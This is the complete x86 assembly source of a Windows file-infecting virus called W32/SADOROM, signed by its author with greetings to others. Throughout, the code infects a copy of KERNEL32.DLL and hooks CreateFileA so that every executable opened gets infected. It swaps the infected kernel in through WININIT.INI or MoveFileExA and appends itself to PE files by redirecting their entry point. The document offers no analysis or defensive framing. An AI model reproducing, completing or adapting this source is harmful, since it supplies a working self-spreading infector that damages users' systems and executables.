;---------------------------- W32 SADOROM BY HenKy ----------------------------- ; ;-AUTHOR: HenKy ; ;-MAIL: HenKy_@latinmail.com ; ;-ORIGIN: SPAIN .586P .MODEL FLAT LOCALS EXTRN ExitProcess:PROC KERNEL95 EQU 0BFF70000h MIX_SIZ EQU FILE_END-MEGAMIX MIX_MEM EQU MEM_END-MEGAMIX NABLA EQU DELTA-MEGAMIX MARKA EQU 66 FLAGZ EQU 00000020H OR 20000000H OR 80000000H MAX_PATH EQU 260 CRATE EQU 0BFF77ADFH TIMEX EQU 0BFF771D8H MACROSIZE MACRO DB MIX_MEM/01000 mod 10 + "0" DB MIX_MEM/00100 mod 10 + "0" DB MIX_MEM/00010 mod 10 + "0" DB MIX_MEM/00001 mod 10 + "0" ENDM .DATA DB 0 .CODE MEGAMIX: CALL DELTA DELTA: POP EBP MOV EAX,[ESP] XOR AX,AX SZ: CMP BYTE PTR [EAX],'M' JZ F_GPA SUB EAX,1000H JMP SZ NEW_EIP DD 0 GEMA_TANZEN_SO_FAR DB ' SI LA COSA ESTA MAL... VOY A SADOROM',0 NTF DB 0 F_GPA: MOV BYTE PTR [EBP+NTF-DELTA],0 LEA ESI,[EBP+GPA_95-DELTA] MOV EDI,EAX PUSH EAX BSWAP EAX CMP AL,0BFH JZ SCANIT CMP AH,0F0H JZ WNT W2000: ADD ESI,8 WNT: ADD ESI,8 MOV BYTE PTR [EBP+NTF-DELTA],1 SCANIT: MOV EDX,800000 SCANKRNL: PUSH 8 POP ECX PUSH ESI PUSH EDI REPZ CMPSB POP EDI POP ESI JZ FOUND INC EDI DEC EDX JZ WARNING JMP SCANKRNL FOUND: INC EDI INC EDI INC EDI MOV [EBP+GPA-DELTA], EDI POP EBX APIZ: LEA ESI, [EBP+APIs-DELTA] LEA EDI, [EBP+APIaddresses-DELTA] GPI: PUSH ESI PUSH EBX CALL [EBP+GPA-DELTA] CLD STOSD NPI: LODSB OR AL, AL JNZ SHORT NPI CMP [ESI], AL JNZ GPI ;MOV BYTE PTR [EBP+KF-DELTA],1 ;LEA ESI,[EBP+FNAME-DELTA] ;CALL INFECT ;JMP WARNING PUSH 260 LEA EBX,[EBP+szSystemKernel1-DELTA] PUSH EBX CALL [EBP+GetSystemDirectoryA-DELTA] PUSH 260 LEA EBX,[EBP+szSystemKernel2-DELTA] PUSH EBX CALL [EBP+GetSystemDirectoryA-DELTA] LEA EBX,[EBP+kernel_old-DELTA] PUSH EBX LEA EBX,[EBP+szSystemKernel1-DELTA] PUSH EBX CALL [EBP+lstrcat-DELTA] LEA EBX,[EBP+kernel_new-DELTA] PUSH EBX LEA EBX,[EBP+szSystemKernel2-DELTA] PUSH EBX CALL [EBP+lstrcat-DELTA] PUSH 0 LEA EBX,[EBP+szSystemKernel2-DELTA] ;NEW PUSH EBX LEA EBX,[EBP+szSystemKernel1-DELTA] ;OLD PUSH EBX CALL [EBP+CopyFileA-DELTA] MOV BYTE PTR [EBP+KF-DELTA],1 LEA ESI,[EBP+szSystemKernel2-DELTA] CALL INFECT CMP BYTE PTR [EBP+NTF-DELTA],1 JE NTEXOR PUSH 260 LEA EBX,[EBP+szWinInitFile-DELTA] PUSH EBX CALL [EBP+GetWindowsDirectoryA-DELTA] LEA EBX,[EBP+wininit-DELTA] PUSH EBX LEA EBX,[EBP+szWinInitFile-DELTA] PUSH EBX CALL [EBP+lstrcat-DELTA] LEA EBX,[EBP+szWinInitFile-DELTA] PUSH EBX LEA EBX,[EBP+szSystemKernel1-DELTA] PUSH EBX LEA EBX,[EBP+nul-DELTA] PUSH EBX LEA EBX,[EBP+rename-DELTA] PUSH EBX CALL [EBP+WritePrivateProfileStringA-DELTA] LEA EBX,[EBP+szWinInitFile-DELTA] PUSH EBX LEA EBX,[EBP+szSystemKernel2-DELTA] PUSH EBX LEA EBX,[EBP+szSystemKernel1-DELTA] PUSH EBX LEA EBX,[EBP+rename-DELTA] PUSH EBX CALL [EBP+WritePrivateProfileStringA-DELTA] JMP WARNING NTEXOR: PUSH 5 LEA EBX,[EBP+szSystemKernel2-DELTA] ;NEW PUSH EBX LEA EBX,[EBP+szSystemKernel1-DELTA] ;OLD PUSH EBX CALL [EBP+MoveFileExA-DELTA] JMP WARNING KF DB 0 CODEIN: PUSH 12345678H PONEDOR EQU $-4 RET WARNING: MOV EAX,12345678H ORG $-4 OLD_EIP DD 00001000H ADD EAX,12345678H ORG $-4 BASE DD 00400000H PUSH EAX RET CREATEFILE_HANDLER: PUSHF PUSHA CALL DELTOR DELTOR: POP EBP SUB EBP,OFFSET DELTOR ADD EBP,OFFSET DELTA MOV BYTE PTR [EBP+KF-DELTA],0 CMP BYTE PTR [EBP+BUSO-DELTA],1 JE SHE_IS_HOOKER MOV BYTE PTR [EBP+BUSO-DELTA],1 MOV ESI,[ESP+10*4] PUSH ESI FEND: LODSB OR AL, AL JNZ FEND MOV EAX, [ESI-5] POP ESI CMP EAX, 'EXE.' JE AVV CMP EAX, 'exe.' JNE EXIT_HOOK AVV: CALL INFECT EXIT_HOOK: MOV BYTE PTR [EBP+BUSO-DELTA],0 SHE_IS_HOOKER: CMP BYTE PTR [EBP+NTF-DELTA],1 JE NTEX POPA POPF PUSH EDI PUSH 127H JMP EXIT_HOOKER NTEX: POPA POPF PUSH EBP MOV ESP,EBP SUB ESP,8 EXIT_HOOKER: PUSH 12345678H OFFSETOR EQU $-4 RET BUSO DB 0 INFECT: PUSH DWORD PTR [EBP+OLD_EIP-DELTA] PUSH DWORD PTR [EBP+BASE-DELTA] XOR EDX,EDX PUSH EDX PUSH 80h PUSH 3 PUSH EDX PUSH EDX PUSH 0C0000000h PUSH ESI CALL DWORD PTR [EBP+CreateFile-DELTA] INC EAX JZ Cerrar DEC EAX MOV DWORD PTR [EBP+FileHandle-DELTA],EAX ; SAVE HNDL XOR EDX,EDX PUSH EDX PUSH EAX CALL DWORD PTR [EBP+GetFileSize-DELTA] MOV DWORD PTR [EBP+WFD_nFileSizeLow-DELTA],EAX MOV ECX, DWORD PTR [EBP+WFD_nFileSizeLow-DELTA] CALL CreateMap ; CREATE A MAP OR EAX,EAX JZ Cerrar MOV DWORD PTR [EBP+MapHandle-DELTA],EAX MOV ECX, DWORD PTR [EBP+WFD_nFileSizeLow-DELTA] CALL MapFile ; MEMORY PROYECTION OR EAX,EAX JZ Cerrar MOV DWORD PTR [EBP+MapAddress-DELTA],EAX MOV ESI,EAX ; GET PE HDR MOV ESI,[EAX+3CH] ADD ESI,EAX CMP BYTE PTR [ESI],"P" ; IS A 'P'E ? JNZ Cerrar CMP BYTE PTR [EBP+KF-DELTA],1 JNE DREBO CMP BYTE PTR [ESI+MARKA],"H" ; HenKy IS HERE ? JNE GOS POP DWORD PTR [EBP+BASE-DELTA] POP DWORD PTR [EBP+OLD_EIP-DELTA] PUSH DWORD PTR [EBP+FileHandle-DELTA] CALL DWORD PTR [EBP+CloseHandle-DELTA] POP ECX JMP WARNING DREBO: CMP BYTE PTR [ESI+MARKA],"H" ; HenKy IS HERE ? JZ Cerrar GOS: PUSH DWORD PTR [ESI+3CH] PUSH DWORD PTR [EBP+MapAddress-DELTA] ; CLOSE CALL DWORD PTR [EBP+UnmapViewOfFile-DELTA] PUSH DWORD PTR [EBP+MapHandle-DELTA] CALL DWORD PTR[EBP+CloseHandle-DELTA] POP ECX MOV EAX,DWORD PTR [EBP+WFD_nFileSizeLow-DELTA] ; MAP AGAIN WIHT VIRSIZE ADD EAX,MIX_MEM CALL Align XCHG ECX,EAX MOV DWORD PTR [EBP+NewSize-DELTA],ECX CALL CreateMap OR EAX,EAX JZ Cerrar MOV DWORD PTR [EBP+MapHandle-DELTA],EAX MOV ECX,DWORD PTR [EBP+NewSize-DELTA] CALL MapFile OR EAX,EAX ; IM TIRED TO REPEAT THIS SHIT !!! JZ Cerrar MOV DWORD PTR [EBP+MapAddress-DELTA],EAX ; AGAIN MOV ESI,[EAX+3CH] ADD ESI,EAX MOV EDI,ESI MOVZX EAX,WORD PTR [EDI+06H] DEC EAX IMUL EAX,EAX,28H ADD ESI,EAX ADD ESI,78H MOV EDX,[EDI+74H] SHL EDX,3 ADD ESI,EDX PUSHAD CMP DWORD PTR [ESI],"ler." JNZ NO_REL MOV DWORD PTR [ESI],"eti." MOV WORD PTR [ESI+4],"tx" NO_REL: POPAD MOV EBX,[EDI+34H] MOV [EBP+BASE-DELTA],EBX MOV EAX,[EDI+28H] MOV DWORD PTR [EBP+OLD_EIP-DELTA],EAX ;SAVE OLD EIP MOV EDX,[ESI+10H] MOV EBX,EDX ADD EDX,[ESI+14H] PUSH EDX MOV EAX,EBX ADD EAX,[ESI+0CH] MOV DWORD PTR [EBP+NEW_EIP-DELTA],EAX CMP BYTE PTR [EBP+KF-DELTA],1 JE JUMPA XCHG EAX,[EDI+28H] ; NEW EIP JUMPA: MOV EAX,[ESI+10H] ADD EAX,MIX_MEM MOV ECX,[EDI+3CH] CALL Align MOV [ESI+10H],EAX ;NEW PHYSSIZE MOV [ESI+08H],EAX ;NEW VIRTSIZE POP EDX MOV EAX,[ESI+10H] ADD EAX,[ESI+0CH] MOV [EDI+50H],EAX ; NEW IMAGESIZE OR DWORD PTR [ESI+24H],FLAGZ MOV BYTE PTR [EDI+MARKA],"H" ; HenKy! PUSH EDI CMP BYTE PTR [EBP+KF-DELTA],1 JNE JUMPA2 MOV EBX,EDX ADD EBX,[EBP+BASE-DELTA] ADD EBX,(CREATEFILE_HANDLER-MEGAMIX) MOV [EBP+PONEDOR-DELTA],EBX MOV EBX,[EBP+CreateFile-DELTA] SUB EBX,[EBP+BASE-DELTA] ADD EBX,[EBP+MapAddress-DELTA] MOV EDI,EBX LEA ESI,[EBP+CODEIN-DELTA] PUSH 6 POP ECX REP MOVSB MOV EBX,[EBP+CreateFile-DELTA] ADD EBX,6 MOV [EBP+OFFSETOR-DELTA],EBX JUMPA2: LEA ESI,[EBP+MEGAMIX-DELTA] XCHG EDI,EDX ADD EDI,DWORD PTR [EBP+MapAddress-DELTA] PUSH (MIX_MEM / 4) POP ECX REP MOVSD POP EDI CDQ CMP DWORD PTR [EDI+58H], EDX JZ UnMapFile MOV DWORD PTR [EDI+58H], EDX MOV ESI, [EBP+MapAddress-DELTA] MOV ECX, DWORD PTR [EBP+WFD_nFileSizeLow-DELTA] SHR ECX, 1 CHK_LOOP: MOVZX EAX, WORD PTR [ESI] ADD EDX, EAX MOV EAX, EDX AND EDX, 0FFFFh SHR EAX, 16 ADD EDX, EAX INC ESI INC ESI LOOP CHK_LOOP MOV EAX, EDX SHR EAX, 16 ADD AX, DX ADD EAX, DWORD PTR [EBP+WFD_nFileSizeLow-DELTA] MOV DWORD PTR [EDI+58H], EAX UnMapFile: PUSH DWORD PTR [EBP+MapAddress-DELTA] CALL DWORD PTR [EBP+UnmapViewOfFile-DELTA] CloseMap: PUSH DWORD PTR [EBP+MapHandle-DELTA] CALL DWORD PTR [EBP+CloseHandle-DELTA] Cerrar: POP DWORD PTR [EBP+BASE-DELTA] POP DWORD PTR [EBP+OLD_EIP-DELTA] PUSH DWORD PTR [EBP+FileHandle-DELTA] CALL DWORD PTR [EBP+CloseHandle-DELTA] RET SNIFOSO DB ' DediCado A LakAsiTA, pEEwee, lAdepi, tOroNaga, arbeni, sADORom, trENaDO, YECXo,' DB ' ZaRpAx, TmARtIN, tMULET, ulTRAShOCk, MarQuEze, seXpAin... seXsOtrON' DB ' Y LA tIA EnRiKetA' CreateMap: CDQ PUSH EDX PUSH ECX PUSH EDX PUSH 4H PUSH EDX PUSH DWORD PTR [EBP+FileHandle-DELTA] CALL DWORD PTR [EBP+CreateFileMappingA-DELTA] RET MapFile: CDQ PUSH ECX PUSH EDX PUSH EDX INC EDX INC EDX PUSH EDX PUSH DWORD PTR [EBP+MapHandle-DELTA] CALL DWORD PTR [EBP+MapViewOfFile-DELTA] RET ME_ESTOY_RAYANDO_DEMASIADO DB 'SALUDOZ A SANDSTORM, FEDERRICO, JONH_O_ANN, JOSE RUIBAL Y' DB ' GURU JOSH... AH... Y A LAMERGIN TAMBIEN :)' Align: PUSH EDX CDQ PUSH EAX DIV ECX POP EAX SUB ECX,EDX ADD EAX,ECX POP EDX RET DEFINITIVO DB 'AAAAARRR!!! POR FAVOR RAYENSEN' ;DDDDDDDD GPA_95 DB 0C2H,04H,00H,57H,6AH,22H,2Bh,0D2H GPA_NT DB 0C2H,04H,00H,55H,8Bh,4CH,24H,0CH GPA_2KB DB 48H,03H,00H,55H,8Bh,0ECh,51H,51H ;GPA_2K DB 00FH,00H,00H,55H,8Bh,0ECh,51H,51H wininit DB "\\WININIT.INI",0 nul DB "NUL",0 rename DB "Rename", 0 kernel_old DB "\KERNEL32.DLL", 0 kernel_new DB "\SADO.ROM", 0 APIs: DB "CreateFileA",0 DB "CloseHandle",0 DB "MapViewOfFile",0 DB "UnmapViewOfFile",0 DB "CreateFileMappingA",0 DB "GetFileSize",0 DB "CopyFileA",0 DB "WritePrivateProfileStringA",0 DB "lstrcat",0 DB "GetWindowsDirectoryA",0 DB "GetSystemDirectoryA",0 DB "MoveFileExA",0 Zero_ DB 0 copyrisgt DB ' W32/SADOROM' MACROSIZE DB ' by HenKy',0 align 4 FILE_END LABEL BYTE APIaddresses: CreateFile DD 0 CloseHandle DD 0 MapViewOfFile DD 0 UnmapViewOfFile DD 0 CreateFileMappingA DD 0 GetFileSize DD 0 CopyFileA DD 0 WritePrivateProfileStringA DD 0 lstrcat DD 0 GetWindowsDirectoryA DD 0 GetSystemDirectoryA DD 0 MoveFileExA DD 0 GPA DD 0 FileHandle DD 0 NewSize DD 0 MapHandle DD 0 MapAddress DD 0 WFD_nFileSizeLow DD 0 ;FNAME DB 'TEST.ZZZ',0 ;FNAME2 DB 'TEST2.ZZZ',0 szWinInitFile DB 260 dup (0) szSystemKernel1 DB 260 dup (0) szSystemKernel2 DB 260 dup (0) align 4 MEM_END LABEL BYTE EXITPROC: PUSH 0 CALL ExitProcess ENDS END MEGAMIX